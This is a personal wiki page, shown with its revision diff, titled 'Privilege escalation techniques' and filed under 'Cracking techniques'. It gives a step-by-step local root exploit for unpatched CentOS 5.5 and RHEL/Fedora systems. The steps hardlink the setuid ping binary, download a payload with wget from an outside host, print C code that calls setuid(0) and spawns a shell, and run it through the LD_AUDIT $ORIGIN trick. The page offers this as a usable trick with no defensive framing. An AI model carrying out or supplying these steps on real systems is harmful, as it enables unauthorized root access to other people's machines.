Difference between revisions of "Privilege escalation techniques"

From Notes_Wiki
m
m
 
Line 1: Line 1:
<yambe:breadcrumb self="Privilege escalation techniques">Cracking techniques|Cracking techniques</yambe:breadcrumb>
[[Main Page|Home]] > [[Cracking techniques]] > [[Privilege escalation techniques]]
=Privilege escalation techniques=


==Trick 1==
==Trick 1==
Line 23: Line 22:




<yambe:breadcrumb self="Privilege escalation techniques">Cracking techniques|Cracking techniques</yambe:breadcrumb>
 
[[Main Page|Home]] > [[Cracking techniques]] > [[Privilege escalation techniques]]

Latest revision as of 04:23, 18 April 2022

Home > Cracking techniques > Privilege escalation techniques

Trick 1

This trick can be used on CentOS 5.5 machines which have not been updated even if SELinux is enabled. Machines updated after October 2010 seem to be safe against this attack. This also works on Fedora / RHEL type of distributions.

  1. mkdir /tmp/exploit
  2. ln /bin/ping /tmp/exploit/target
  3. exec 3< /tmp/exploit/target
  4. rm -rf /tmp/exploit/
  5. wget pistol.clan.su/payload.c
  6. The payload.c file contains
    void __attribute__((constructor)) init()
    {
    setuid(0);
    system("/bin/bash");
    }
  7. gcc -w -fPIC -shared -o /tmp/exploit payload.c
  8. LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3


Home > Cracking techniques > Privilege escalation techniques